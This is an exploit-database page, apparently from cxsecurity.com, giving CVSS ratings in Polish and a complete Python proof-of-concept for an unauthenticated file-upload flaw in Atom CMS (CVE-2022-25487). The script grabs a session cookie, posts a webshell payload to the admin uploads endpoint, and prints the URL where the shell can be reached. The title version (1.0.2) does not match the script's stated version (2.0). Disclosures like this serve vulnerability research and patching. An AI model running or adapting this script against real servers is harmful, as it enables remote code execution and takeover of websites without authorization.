Atom CMS 1.0.2 Shell Upload

2022.03.31
Credit: Ashish Koli
Risk: High
Local: No
Remote: Yes
CWE: CWE-264


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

# Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE) # Date: 22.03.2022 # Exploit Author: Ashish Koli (Shikari) # Vendor Homepage: https://thedigitalcraft.com/ # Software Link: https://github.com/thedigicraft/Atom.CMS # Version: 2.0 # Tested on: Ubuntu 20.04.3 LTS # CVE: CVE-2022-25487 # Description This script uploads webshell.php to the Atom CMS. An application will store that file in the uploads directory with a unique number which allows us to access Webshell. # Usage : python3 exploit.py <IP> <Port> <atomcmspath> # Example: python3 exploit.py 127.0.0.1 80 /atom # POC Exploit: https://youtu.be/qQrq-eEpswc # Note: Crafted "Shell.txt" file is required for exploitation which is available on the below link: # https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC ''' Description: A file upload functionality in Atom CMS 2.0 allows any non-privileged user to gain access to the host through the uploaded files, which may result in remote code execution. ''' #!/usr/bin/python3 ''' Import required modules: ''' import sys import requests import json import time import urllib.parse import struct import re import string import linecache proxies = { 'http': 'http://localhost:8080', 'https': 'https://localhost:8080', } ''' User Input: ''' target_ip = sys.argv[1] target_port = sys.argv[2] atomcmspath = sys.argv[3] ''' Get cookie ''' session = requests.Session() link = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin' response = session.get(link) cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') ''' Upload Webshell: ''' # Construct Header: header1 = { 'Host': target_ip, 'Accept': 'application/json', 'Cache-Control': 'no-cache', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36', 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L', 'Origin': 'http://' + target_ip, 'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9', 'Cookie': cookie, 'Connection': 'close', } # loading Webshell payload: path = 'shell.txt' fp = open(path,'rb') data= fp.read() # Uploading Webshell: link_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1' upload = requests.post(link_upload, headers=header1, data=data) p=upload.text x = re.sub("\s", "\n", p) y = x.replace("1<br>Unknown", "null") z = re.sub('[^0-9]', '', y) ''' Finish: ''' print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php') print('')


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top